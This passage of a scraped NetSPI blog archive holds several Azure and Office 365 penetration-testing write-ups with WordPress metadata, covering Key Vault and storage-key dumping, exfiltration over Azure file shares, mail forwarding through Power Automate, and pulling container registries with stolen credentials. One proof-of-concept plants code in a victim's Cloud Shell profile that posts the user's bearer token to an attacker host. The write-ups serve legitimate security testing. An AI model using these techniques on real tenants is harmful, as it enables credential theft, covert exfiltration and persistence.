$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

[Screenshot: Keyvault]

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scoped to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

Get-AzPasswords: Encrypting Automation Password Data (published July 29, 2020)

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

[Screenshot: Ctcreds]

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser-privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's less concern of someone decrypting the credential data from the logs after the fact.
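
A stripped-down sketch of the same idea using the built-in CMS cmdlets (not the exact Get-AzPasswords implementation, and $credentialData is a placeholder for the gathered credential text):

# Create a document encryption cert and export the public half (this is what gets pushed up to the runbook)
$cert = New-SelfSignedCertificate -Subject 'CN=microburst' -Type DocumentEncryptionCert -CertStoreLocation Cert:\CurrentUser\My
Export-Certificate -Cert $cert -FilePath .\microburst.cer | Out-Null

# Runbook side - encrypt the credential data with the public cert before writing it to the job output
$encrypted = Protect-CmsMessage -Content $credentialData -To .\microburst.cer

# Testing system side - decrypt the retrieved output with the private key in the local cert store
Unprotect-CmsMessage -Content $encrypted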

The Results

Those same credentials from above will now look like this in the output logs:

[Screenshot: Enccreds]

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

Azure File Shares for Pentesters (published July 16, 2020)

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: \\testingbox\tools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence, I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”) and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mentioned on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.net\payloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things and remove the connectTestResult commands from that code:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"AzureSTORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.
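
The same key rotation can be scripted with the Az module if you'd rather not use the portal (resource names are placeholders):

# Hypothetical names - regenerate key1 for the storage account that hosted the share
New-AzStorageAccountKey -ResourceGroupName 'example-rg' -Name 'examplestorage' -KeyName key1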

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`" STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure STORAGE_ACCT_NAME`" /pass:`" STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.

[post_title] => Azure File Shares for Pentesters [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-file-shares-for-pentesters [to_ping] => [pinged] => [post_modified] => 2021-07-12 13:18:02 [post_modified_gmt] => 2021-07-12 18:18:02 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11709 [menu_order] => 123 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 11569 [post_author] => 10 [post_date] => 2020-06-25 07:00:40 [post_date_gmt] => 2020-06-25 07:00:40 [post_content] =>

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".

Connections

2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.

Newconnection

3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".

Start

5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.

Build

6. Select any advanced options and add a new step.

Newstep

7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.

Addedstep

8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.

Messageid

9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but really recommended - Add one more step "Mark as read or unread (V2)" from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.

Unread

11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

Success

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office 365 Security & Compliance center, so you can at least log and alert on the creation of new flows.
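If you have Exchange Online PowerShell access to the tenant, one way to review that activity is the unified audit log. A minimal sketch is below; the date range is just an example, and the exact output properties may vary slightly by module version:

# Requires the ExchangeOnlineManagement module and audit log search rights
Connect-ExchangeOnline

# Pull the last 30 days of Power Automate (Microsoft Flow) audit events
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-30) -EndDate (Get-Date) -RecordType MicrosoftFlow -ResultSize 1000 |
    Select-Object CreationDate, UserIds, Operations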

For anyone looking to map these activities back to the MITRE ATT&CK framework, check out these links:

Prior Work

Some related Microsoft Flow research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-forwarding-restrictions-power-automate [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:27 [post_modified_gmt] => 2021-06-08 22:00:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11569 [menu_order] => 129 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 11564 [post_author] => 10 [post_date] => 2020-05-12 07:00:00 [post_date_gmt] => 2020-05-12 07:00:00 [post_content] =>

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.

Acrinfo

For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.

Acrpass

The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through the next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

Basicauth
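For reference, a minimal sketch of that request looks something like this (the credentials are obviously placeholders, and this is just an illustration of the API call, not the exact code from the screenshot):

$username = "EXAMPLEACR"
$password = "A_SuperSecretPassword"
$registry = "EXAMPLEACR.azurecr.io"

# Build a Basic Authorization header from the admin credentials
$basicAuth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${username}:${password}"))
$headers = @{ Authorization = "Basic $basicAuth" }

# List all of the repositories (images) in the registry
$catalog = Invoke-RestMethod -Uri "https://$registry/v2/_catalog" -Headers $headers
$catalog.repositories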

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

Enumtags
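Again, a minimal sketch of the tag enumeration, reusing the $registry, $headers, and $catalog values from the previous snippet:

# Enumerate the available tags for each repository returned by _catalog
foreach ($image in $catalog.repositories) {
    $tags = Invoke-RestMethod -Uri "https://$registry/v2/$image/tags/list" -Headers $headers
    foreach ($tag in $tags.tags) {
        "docker pull $registry/${image}:$tag"
    }
}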

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that can be run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container; bash may not always be available for you

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
[
  {
    "adminUserEnabled": true,
    "creationDate": "2019-09-17T20:42:28.689397+00:00",
    "id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
    "location": "centralus",
    "loginServer": "netspiACR.azurecr.io",
    "name": "netspiACR",
    [Truncated]
    "type": "Microsoft.ContainerRegistry/registries"
  }
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR
[
"ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
"latest"
]

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated and have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-acrs-with-compromised-credentials [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:23 [post_modified_gmt] => 2021-06-08 22:00:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11564 [menu_order] => 144 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 18419 [post_author] => 2 [post_date] => 2020-04-16 15:47:52 [post_date_gmt] => 2020-04-16 20:47:52 [post_content] =>

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. Additionally, attackers are automated and capable. While these attackers continuously probe and find access or vulnerabilities on many different levels, their success usually results from human error in code or infrastructure configurations, such as open admin ports and overprivileged identity roles.

During this co-sponsored webinar, you will learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. NetSPI and DisruptOps will share how to find and remediate your own vulnerabilities more efficiently, before the attackers do.

[post_title] => Securing The Cloud: Top Down and Bottom Up [post_excerpt] => As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securing-the-cloud-top-down-and-bottom-up [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:57:27 [post_modified_gmt] => 2021-06-02 08:57:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18419 [menu_order] => 38 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 11373 [post_author] => 10 [post_date] => 2020-04-16 07:00:44 [post_date_gmt] => 2020-04-16 07:00:44 [post_content] => In the previous Azure Managed Identities blog, we covered some simple proof of concept examples for using Azure Virtual Machine Managed Identities to escalate privileges in an Azure subscription. The example code relied on Azure OAuth bearer tokens that were generated from authenticating to the Azure metadata service. Since posting that blog, we've found a handful of other places in Azure that generate similar types of bearer tokens that can be used with the publicly available REST APIs during pen tests. In this follow-up post, we will cover how to collect bearer tokens from additional services and introduce a new scripts section in MicroBurst that can be used with these tokens to gather Azure information, and/or escalate privileges in an Azure subscription.

A Primer on Bearer Tokens

Azure Bearer tokens are the core of authentication/authorization for the Azure APIs. The tokens can be generated from a number of different places, and have a variety of uses, but they are a portable token that can be used for accessing Azure REST APIs. The token is in a JWT format that should give you a little more insight about the user it's issued to, once you pull apart the JWT. For the purposes of this blog, we won't be going into the direct authentication (OAuth/SAML) to login.microsoftonline.com. The examples here will be tied to gathering tokens from existing authenticated sessions or Azure services. For more information on the Microsoft authentication model, here's Microsoft's documentation. An important thing to note here is the scope of the token. If you only request access to https://management.azure.com/, that's all that your token will have access to. If you want access to other services (https://vault.azure.net/) you should request that in the "scope" (or resource) section of the initial request. In some cases, you may need to request multiple tokens to cover the services you're trying to access. There are "refresh" tokens that are normally used for extending scope for other services, but those won't be available in all of our examples below. For the sake of simplicity, each example listed below is scoped to management.azure.com. For more information on the token structure, please consult the Microsoft documentation.
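If you want to take a quick look inside one of these tokens, the payload is just base64url-encoded JSON. Here's a minimal decoding sketch (inspection only, no signature validation; the token value is a placeholder for your own):

# Decode the claims from the middle segment of a JWT bearer token
$jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."   # your bearer token goes here
$payload = $jwt.Split('.')[1].Replace('-', '+').Replace('_', '/')

# Pad the base64url string back out to a multiple of four characters
switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }

# The aud, upn/appid, and oid claims are usually the interesting ones
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json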

Gathering Tokens

Below is an overview of the different services that we will be gathering bearer tokens from in this blog:

Azure Portal

We'll start things off with an easy token to help explain what these bearer tokens look like. Log in to the Azure portal with a proxy enabled, and observe the Bearer token in the Authorization header.

From a pen tester's perspective, you may be able to intercept a user's web traffic in order to get access to this token. This token can then be copied off to be used in other tools/scripts that need to make requests to the management APIs.

Azure CLI Files

The Azure CLI also uses bearer tokens and stores them in the "c:\Users\%USERNAME%\.azure\accessTokens.json" file. These tokens can be directly copied out of the file and used with the management REST APIs, or if you want to use the AZ CLI on your own system with "borrowed" tokens, you can just replace the contents of the file on your own system to assume those tokens. If you're just looking for a quick way to grab tokens from your currently logged in user, here's some basic PowerShell that will help:
gc c:\Users\$env:USERNAME\.azure\accessTokens.json | ConvertFrom-Json
These tokens are scoped to the management.core.windows.net resource, but there should be a refresh token that you can use to request additional tokens. Chris Maddalena from SpecterOps has a great post that helps outline this (and other Azure tips). Lee Kagan and RJ McDown from Lares also put out a series that covers some similar concepts (relating to capturing local Azure credentials) as well (Part 1) (Part 2).

Virtual Machine Managed Identities

In the previous blog, we covered Virtual Machine Managed Identities and gave two proof of concept examples (escalate to Owner, and list storage account keys). You can see the previous blog to get a full overview, but in general, you can authenticate to the VM Metadata service (different from login.microsoftonline.com) as the Virtual Machine, and use the tokens with the REST APIs to take actions.

From a Managed Identity VM, you can execute the following PowerShell commands to get a bearer token:
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
One of the key things to note here is the fact that the Azure metadata service that we authenticate to requires specific headers to be present when making requests for credentials. This helps reduce the potential impact of a Server-Side Request Forgery (SSRF) attack.

Automation Account "RunAs" Accounts

In order to generate a token from an existing Runbook/Automation Account RunAs account, you will need to create a new (or modify an existing) runbook that authenticates the RunAs account, and then access the token with the runbook code. You can use the following code to accomplish this:
# Get Azure Run As Connection Name
$connectionName = "AzureRunAsConnection"

# Get the Service Principal connection details for the Connection name
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName

# Logging in to Azure AD with Service Principal
"Logging in to Azure AD..."
$azcontext = Connect-AzureRMAccount -TenantId $servicePrincipalConnection.TenantId `
-ApplicationId $servicePrincipalConnection.ApplicationId `
-CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

# https://gallery.technet.microsoft.com/scriptcenter/Easily-obtain-AccessToken-3ba6e593
$azureRmProfile = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile
$azureRmProfile
$currentAzureContext = Get-AzureRmContext
$profileClient = New-Object Microsoft.Azure.Commands.ResourceManager.Common.RMProfileClient($azureRmProfile)

$token = $profileClient.AcquireAccessToken($currentAzureContext.Tenant.TenantId)
$token | convertto-json
$token.AccessToken
Keep in mind that this token will be for the Automation Account "RunAs" account, so you will most likely have subscription contributor rights with this token. Added bonus here: if you'd like to stay under the radar, create a new runbook or modify an existing runbook, and use the "Test Pane" to run the code. This will keep the test run from showing up in the jobs logs, and you can still access the token in the output. This heavily redacted screenshot will show you how the output should look.

This code can also be easily modified to post the token data off to a web server that you control (see the next section). This would be helpful if you're looking for a more persistent way to generate these tokens. If you're going that route, you could also set the runbook to run on a schedule, or potentially have it triggered by a webhook. See the previous Automation Account persistence blog for more information on that.

Cloud Shell

The Azure Cloud shell has two ways that it can operate (Bash or PowerShell), but thankfully the same method can be used by both to get a bearer token for a user.
curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s
I wasn't able to find exact specifics around the source of this localhost service, but given the Cloud Shell architecture, I'm assuming that this "localhost:50342" service is just used to help authenticate Cloud Shell users for existing tools, like the AZ CLI, in the shell.

From a pen tester's perspective, it would be most practical to modify a Cloud Shell home directory (See Previous Blog) for another (more privileged) user to capture this token and send it off to a server that you control. This is particularly impactful if your victim Cloud Shell has higher privileges than your current user. By appending the following lines of PowerShell to the profile file, you can have Cloud Shell quietly send off a new bearer token as a POST request to a web server that you control (example.com). Proof of Concept Code:
$token = (curl http://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s)
Invoke-WebRequest 'example.com' -Body $token -Method 'POST' | out-null
*For this example, I just set up a Burp Collaborator host (example.com) to post this token to.

Given that this bearer token doesn't carry a refresh token, you may want to modify the PoC code above to request tokens for multiple resources.

Using the Tokens

Now that we have a token, we will want to make use of it. As a simple proof of concept, we can use the Get-AZStorageKeysREST function in MicroBurst, with a management.azure.com scoped bearer token, to list out any available storage account keys.
Get-AZStorageKeysREST -token YOUR_TOKEN_HERE
This will prompt you for the subscription that you want to use, but you can also specify the desired subscription with the -subscriptionId flag. Stay tuned to the NetSPI blog for future posts, where we will cover how to make use of these tokens with the Azure REST APIs to do information gathering, privilege escalation, and credential gathering. The initial (and future) scripts will be in the REST folder of the MicroBurst repo.

Conclusion

While this isn't an exhaustive list, there are lots of ways to get bearer tokens in Azure, and while they may have limited permissions (depending on the source), they can be handy for information gathering, persistence, and/or privilege escalation in certain situations. Feel free to let me know if you've had a chance to make use of Azure Bearer tokens down in the comments, or out in the MicroBurst GitHub repository. [post_title] => Gathering Bearer Tokens from Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-bearer-tokens-azure [to_ping] => [pinged] => [post_modified] => 2021-06-11 15:19:21 [post_modified_gmt] => 2021-06-11 15:19:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11373 [menu_order] => 152 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 19769 [post_author] => 2 [post_date] => 2020-03-04 10:41:04 [post_date_gmt] => 2020-03-04 10:41:04 [post_content] =>

Watch the first webinar in our Lunch & Learn Series below!

With the increase in hybrid cloud adoption that extends traditional Active Directory domain environments into Azure, penetration tests and red team assessments are more frequently bringing Azure tenants into the engagement scope. Attackers are often finding themselves with an initial foothold in Azure, but lacking in ideas on what an escalation path would look like.

In this webinar, Karl Fosaaen covers some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. In addition to this, he covers some techniques for maintaining that privileged access after an initial escalation. Throughout each section, he shares some of the tools that can be used to help identify and exploit the issues outlined.

https://youtu.be/zzP3HSWyu4M
[post_title] => Adventures in Azure Privilege Escalation Webinar [post_excerpt] => During this webinar, NetSPI’s Karl Fosaaen will cover some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adventures-in-azure-privilege-escalation-webinar [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:57:56 [post_modified_gmt] => 2021-06-02 08:57:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19769 [menu_order] => 41 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 17411 [post_author] => 2 [post_date] => 2020-02-26 10:40:32 [post_date_gmt] => 2020-02-26 16:40:32 [post_content] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_title] => Best Practices to Protect Your Organization's Cloud Assets [post_excerpt] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 